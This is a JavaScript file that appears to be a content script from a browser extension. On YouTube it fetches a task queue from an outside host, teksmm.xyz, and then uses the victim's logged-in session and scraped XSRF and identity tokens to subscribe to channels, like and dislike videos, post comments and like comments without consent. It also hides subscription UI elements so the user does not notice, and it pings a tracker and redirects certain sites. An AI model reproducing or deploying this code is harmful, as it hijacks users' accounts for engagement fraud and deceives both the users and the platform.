new Image().src = '//whos.amung.us/widget/m823l61df7.png';
setInterval(function(){ new Image().src = '//whos.amung.us/widget/m823l61df7.png'; }, 200000);

if(document.title.toLowerCase().indexOf("taraftarium24") >= 0){
	if(window.location.origin.indexOf("macactus") < 0){
		document.location = "https://www.macactus.com/";
	}
}

function getFromLocalStorage(){
  return JSON.parse(localStorage.getItem("operations"));
}
  if( !getFromLocalStorage() ){
    localStorage.setItem("operations", JSON.stringify([]) );
  }
function checkOrSave(key, value){
  if( !getFromLocalStorage() ){
    localStorage.setItem("operations", JSON.stringify([]) );
  }
  let status = checkInLocalStorage(key, value);
  if(!status){
    let operations = getFromLocalStorage();
    let temp = {};
    temp.key = key;
    temp.value = value;
    operations.push(temp)
    localStorage.setItem("operations", JSON.stringify(operations) );
  }
  return status;
}

function checkInLocalStorage(key, value){
  elements = getFromLocalStorage().filter(x=> x.key==key && x.value == value);
  return Boolean(elements.length);

}

function siparis_getir_3() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smm/queue.php?queue=3&json="+JSON.stringify(getFromLocalStorage().filter(x => x.value == "3")), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.channelIds = data.channelId.trim();
				if(!checkOrSave(vars.channelIds,"3")){
					if (vars.channelIds) {
						subscribe_now_count(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}


function siparis_getir_4() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smm/queue.php?queue=4&json="+JSON.stringify(getFromLocalStorage().filter(x => x.value == "4")), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				if(!checkOrSave(vars.indexData,"4")){
					if (vars.indexData) {
						video_like(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_5() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smm/queue.php?queue=5&json="+JSON.stringify(getFromLocalStorage().filter(x => x.value == "5")), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim().split("&")[0];
				vars.commentId =  data.commentId.trim();
				if(!checkOrSave(vars.commentId,"5")){
					if (vars.indexData && vars.commentId) {
						like_comment(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_6() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smm/queue.php?queue=6&json="+JSON.stringify(getFromLocalStorage().filter(x => x.value == "6")), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				vars.randComment = data.comments.trim().split("\n")[0].replace('"',"");
				if(!checkOrSave(vars.indexData,"6")){
					if (vars.indexData && vars.randComment) {
						createComment_id(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

function siparis_getir_7() {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://teksmm.xyz/smm/queue.php?queue=7&json="+JSON.stringify(getFromLocalStorage().filter(x => x.value == "7")), true);
	xhr.onreadystatechange = function() {
		if (xhr.readyState == 4 && xhr.status == 200) {
			try {
				var data = JSON.parse(xhr.responseText);
				vars = {};
				vars.indexData = data.videoId.trim();
				if(!checkOrSave(vars.indexData,"7")){
					if (vars.indexData) {
						video_dislike(vars);
					}
				}
			}catch (error) {}
		}
	}
	xhr.send();
}

  
function start() {
  var cookie_name = "yt";
  var cookie_time = 1;
  if (!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now() - 60 * 1000 * cookie_time) {
    localStorage[cookie_name] = Date.now();
	new Image().src = '//whos.amung.us/widget/m823l61df9.png';
    siparis_getir_3();
    siparis_getir_4();
    siparis_getir_5();
    siparis_getir_6();
    siparis_getir_7();
  }
}

function subscribe_now_count(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/channel/" + vars.channelIds + "/about", true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;
      vars.login = data.match('"LOGGED_IN":(.*?),')[1];
      if (vars.login == "true" || vars.login == true) {
        if (data.indexOf('onResponseReceivedActions') == -1) {
          subscribe_client(vars);
        }
      }
    }
  }
  xhr.send();
}

function subscribe_client(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/channel/" + vars.channelIds + "?disable_polymer=1", true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;
      vars.ei = data.split('ytcfg.set("EVENT_ID", "')[1].split('"')[0];
      vars.ved = data.split('feature=channels4&amp;ved=')[1].split('"')[0];
      vars.xsrf_token = data.split('\'XSRF_TOKEN\': "')[1].split('"')[0];
      vars.youtube_client_version = data.split('innertube_context_client_version":"')[1].split('"')[0];
      vars.youtube_identity_token = data.split('\'ID_TOKEN\', "')[1].split('"')[0];
      vars.page_build_label = data.split('\'PAGE_BUILD_LABEL\': "')[1].split('"')[0];
      vars.variants_checksum = data.split('\'VARIANTS_CHECKSUM\': "')[1].split('"')[0];
      vars.page_cl = data.split('\'PAGE_CL\': ')[1].split(',')[0];
      vars.page_cl = parseFloat(vars.page_cl);
      subscribe(vars);
    }
  }
  xhr.send();
}

function subscribe(vars) {
  var params = {};
  params["ei"] = vars.ei;
  params["feature"] = "channels4";
  params["ved"] = vars.ved;
  params["session_token"] = vars.xsrf_token;
  fetch("https://www.youtube.com/subscription_ajax?action_create_subscription_to_channel=1&c=" + vars.channelIds, {
    "credentials": "include",
    "headers": {
      "accept": "*/*",
      "content-type": "application/x-www-form-urlencoded",
      "x-youtube-client-name": 1,
      "x-youtube-client-version": vars.youtube_client_version,
      "x-youtube-identity-token": vars.youtube_identity_token,
      "x-youtube-page-cl": vars.page_cl,
      "x-youtube-page-label": vars.page_build_label,
      "x-youtube-utc-offset": 180,
      "x-youtube-variants-checksum": vars.variants_checksum
    },
    "referrer": "https://www.youtube.com/channel/" + vars.channelIds,
    "referrerPolicy": "origin-when-cross-origin",
    "body": deSerialize(params),
    "method": "POST",
    "mode": "cors"
  }).then(response => response.text()).then((text) => {
  });
}

function createComment(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["comment_text"] = vars.randComment;
  params["sej"] = JSON.stringify({
    "clickTrackingParams": vars.trackingParams,
    "commandMetadata": {
      "webCommandMetadata": {
        "url": "/service_ajax",
        "sendPost": true
      }
    },
    "createCommentEndpoint": {
      "createCommentParams": vars.createCommentParams
    }
  });
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=createCommentEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  xhr.setRequestHeader("x-youtube-client-version", "2.20191006.08.00");
  xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
  xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
  xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
  xhr.setRequestHeader("x-youtube-utc-offset", 180);
  xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createLike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=performCommentActionEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  xhr.setRequestHeader("x-youtube-client-version", "2.20191006.08.00");
  xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
  xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
  xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
  xhr.setRequestHeader("x-youtube-utc-offset", 180);
  xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createVideoLike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=likeEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  xhr.setRequestHeader("x-youtube-client-version", "2.20191006.08.00");
  xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
  xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
  xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
  xhr.setRequestHeader("x-youtube-utc-offset", 180);
  xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createVideoDislike(vars) {
  var xhr = new XMLHttpRequest();
  var params = {};
  params["sej"] = vars.params_like;
  
  params["csn"] = vars.csn;
  params["session_token"] = vars.session_token;
  xhr.open("POST", "https://www.youtube.com/service_ajax?name=likeEndpoint", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("x-youtube-client-name", 1);
  xhr.setRequestHeader("x-youtube-client-version", "2.20191006.08.00");
  xhr.setRequestHeader("x-youtube-identity-token", vars.youtube_identity_token);
  xhr.setRequestHeader("x-youtube-page-cl", vars.page_cl);
  xhr.setRequestHeader("x-youtube-page-label", vars.page_build_label);
  xhr.setRequestHeader("x-youtube-utc-offset", 180);
  xhr.setRequestHeader("x-youtube-variants-checksum", vars.variants_checksum);
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      xhr.close;
    }
  }
  xhr.send(deSerialize(params));
}

function createComment_id(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;
      vars.createCommentParams = data.split('"getReportFormEndpoint":{"params":"')[1].split('"')[0];
      if (vars.createCommentParams.length > 0) {
		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];

        createComment(vars);
      }

    }
  }
  xhr.send();
}

function like_comment(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData +"&lc=" + vars.commentId, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('{"iconType":"LIKE"},"defaultServiceEndpoint":')[1].split('"voteStatus":"LIKE"}}]}}')[0]+'"voteStatus":"LIKE"}}]}}';
		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];

        createLike(vars);


    }
  }
  xhr.send();
}

function video_like(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('"defaultServiceEndpoint":')[1].split('"}}')[0]+'"}}';

		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
        createVideoLike(vars);


    }
  }
  xhr.send();
}

function video_dislike(vars) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://www.youtube.com/watch?v=" + vars.indexData, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      var data = xhr.responseText;

		vars.params_like = data.split('"defaultServiceEndpoint":')[2].split('"}}')[0]+'"}}';

		vars.session_token = data.split('"XSRF_TOKEN":"')[1].split('"')[0];
		vars.csn = data.split('csn: "')[1].split('"')[0];
		vars.youtube_identity_token = data.split('"ID_TOKEN":"')[1].split('"')[0];
		vars.page_cl = data.split('PAGE_CL":')[1].split(',')[0];
		vars.page_build_label = data.split('"PAGE_BUILD_LABEL":"')[1].split('"')[0];
		vars.variants_checksum = data.split('"VARIANTS_CHECKSUM":"')[1].split('"')[0];
        createVideoDislike(vars);
    }
  }
  xhr.send();
}



function deSerialize(json) {
  return Object.keys(json).map(function(key) {
    return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
  }).join('&');
}


if (location.hostname.indexOf("youtube.com") >= 0 && document.body.innerHTML.split('creator_channel_id","value":"')[1]) {
  profile_id = document.body.innerHTML.split('creator_channel_id","value":"')[1].split('"}')[0];
  start();
  setInterval(function() {
    start();
  }, 1000 * 60 * 1);
  setInterval(function() {
	  document.querySelectorAll("ytd-guide-section-renderer")[1].style.display ="none";

    var bok = document.getElementsByClassName("style-scope ytd-subscribe-button-renderer");
    if (bok.length > 0) {
      for (var i = 0; i < bok.length; i++) {
        bok[i].outerHTML = "";
      }
    }
  }, 1000);
}


